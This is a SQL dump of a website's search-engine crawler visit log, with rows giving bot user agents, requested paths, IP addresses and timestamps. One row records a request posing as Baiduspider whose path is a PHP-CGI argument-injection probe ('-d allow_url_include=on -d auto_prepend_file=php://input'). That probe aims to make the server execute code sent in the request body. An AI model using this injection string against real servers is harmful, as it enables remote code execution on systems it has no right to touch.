INSERT INTO `ey_weapp_spider_visit` VALUES ('96174', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bengche/', '162.55.86.60', '1661218094', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96165', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/211.html', '185.191.171.35', '1661216107', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96166', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/343.html', '116.179.32.69', '1661216378', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96253', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/492.html', '66.249.79.110', '1661228525', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95789', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24_5.html', '185.191.171.37', '1661007174', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96163', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_51/', '185.191.171.6', '1661215291', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96140', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/whs.html', '114.119.151.153', '1661204498', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96273', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/396.html', '114.119.151.153', '1661235888', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96274', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/488.html', '116.179.32.35', '1661236014', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96016', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1661146499', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96028', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.108', '1661153647', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95997', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/yqal/', '66.249.79.112', '1661138971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96006', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661141051', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96008', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/87.html', '185.191.171.1', '1661142965', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95994', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '116.179.32.222', '1661137364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96000', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input', '209.141.57.123', '1661139274', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96013', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/', '66.249.79.108', '1661145209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95863', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lzs.html', '114.119.151.153', '1661063648', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95866', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/159.html', '114.119.151.153', '1661064595', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95872', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/167.html', '185.191.171.9', '1661068440', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96331', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_28/', '185.191.171.17', '1661254612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95873', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/466.html', '185.191.171.16', '1661070677', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95874', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/218.html', '114.119.151.155', '1661070688', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96328', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zy.html', '114.119.151.153', '1661254163', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95876', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.108', '1661071021', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95881', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/225.html', '220.181.108.147', '1661071234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95877', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_5/', '220.181.108.81', '1661071232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95878', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/127.html', '116.179.32.202', '1661071233', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95879', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/127.html', '116.179.32.16', '1661071234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96315', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/343.html', '17.121.115.249', '1661251132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96516', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_4.html', '220.181.108.104', '1661343397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96508', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/139.html', '185.191.171.18', '1661338874', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96766', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/262.html', '162.55.86.60', '1661444507', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96515', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/114.html', '185.191.171.33', '1661343330', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96272', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/136.html', '114.119.151.155', '1661235579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96270', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_40/', '114.119.151.155', '1661235085', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95871', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.108', '1661067953', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95790', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_17.html', '220.181.108.94', '1661009869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95846', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/', '114.119.151.153', '1661056896', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95851', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1661057983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95849', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor/25.html', '114.119.151.153', '1661057696', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96353', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tns.html', '114.119.151.153', '1661268912', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96347', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/231.html', '114.119.151.153', '1661265672', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95845', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661056691', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95794', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_44/', '116.179.32.44', '1661014778', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95795', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.108', '1661015444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95797', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.110', '1661016633', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95798', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/52_3.html', '185.191.171.26', '1661017261', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95796', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/165.html', '185.191.171.40', '1661016625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95824', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yb.html', '114.119.151.153', '1661035001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96355', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.230.130', '1661270988', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96356', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/492.html', '66.249.79.112', '1661272418', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96357', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/62.html', '185.191.171.4', '1661272629', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95830', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_20.html', '116.179.32.13', '1661041777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95831', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/135_2.html', '185.191.171.16', '1661042836', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96329', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/184_3.html', '185.191.171.19', '1661254275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95875', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.175', '1661070998', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95837', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/230.html', '114.119.151.153', '1661050423', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95820', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.99', '1661034010', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95821', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/384.html', '114.119.151.155', '1661034175', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95822', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/242.html', '114.119.151.153', '1661034272', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95823', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_16/', '185.191.171.44', '1661034801', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95802', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_35/', '116.179.32.150', '1661019688', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95813', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_51/', '116.179.32.95', '1661029505', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95815', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_15.html', '185.191.171.14', '1661030806', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95818', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_34/', '114.119.151.155', '1661032457', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95819', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.108', '1661033032', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96358', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/432.html', '66.249.79.108', '1661272719', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96359', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/74.html?admin_id=1', '185.191.171.15', '1661272847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95746', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/25_3.html', '220.181.108.176', '1660981843', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95804', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_42/', '185.191.171.18', '1661019979', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95806', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/230.html', '66.249.79.112', '1661023879', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95745', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_69/', '185.191.171.44', '1660980957', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95803', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.112', '1661019730', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95809', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661026709', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95720', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bengcheal/', '114.119.151.155', '1660967342', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97844', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nc.html', '114.119.151.155', '1661910263', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95714', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/68.html', '185.191.171.13', '1660965516', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95713', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/29.html', '220.181.108.174', '1660965230', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95833', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/411.html', '185.191.171.8', '1661046782', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96346', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/41.html', '185.191.171.36', '1661265242', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95712', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_25.html', '185.191.171.13', '1660964916', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95711', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/473.html', '157.55.39.117', '1660964513', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95710', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/changjianwenda/', '207.46.13.215', '1660963779', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95099', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660623624', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95100', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/changjianwenda/list_20_4/', '114.119.151.153', '1660623763', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95086', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/322.html', '185.191.171.35', '1660617107', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95088', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_19.html', '185.191.171.20', '1660617837', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95085', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/buliaoji', '40.77.167.13', '1660616949', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95084', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.88', '1660616805', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95090', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660619338', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95101', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_8.html', '116.179.32.176', '1660624310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95098', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/47_2.html', '185.191.171.22', '1660622740', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95107', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/246.html', '114.119.151.155', '1660626615', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95108', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/90.html', '114.119.151.153', '1660626748', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95112', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/hangyexinwen/list_18_23/', '66.249.79.110', '1660627092', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95109', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/182.html', '114.119.151.155', '1660626886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95111', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/445.html', '216.244.66.194', '1660627090', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95113', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_61/', '216.244.66.194', '1660627563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95120', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ezs.html', '114.119.151.155', '1660629392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95129', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_30.html', '220.181.108.175', '1660632125', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95127', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/56_2.html', '185.191.171.43', '1660632058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95141', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_38/', '114.119.151.153', '1660638760', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95126', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/', '114.119.151.153', '1660631397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95142', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660640042', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95125', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.110', '1660630992', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95131', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/27.html', '185.191.171.18', '1660632997', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95134', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/322.html', '66.249.79.108', '1660634161', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95155', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.110', '1660645953', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95158', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/5_2.html', '66.249.79.108', '1660647289', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95193', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/403.html', '116.179.32.113', '1660662885', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95159', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_24.html', '185.191.171.21', '1660648155', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95167', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/jiaruwomen/', '185.191.171.14', '1660652449', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95176', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/fxs.html', '114.119.151.153', '1660655224', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95169', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/224.html', '216.244.66.194', '1660653625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95174', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.118', '1660654807', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95175', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/352.html', '185.191.171.43', '1660655206', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95180', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660656842', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95181', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/', '207.46.13.59', '1660656914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95196', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/100.html', '220.181.108.91', '1660664848', '0');
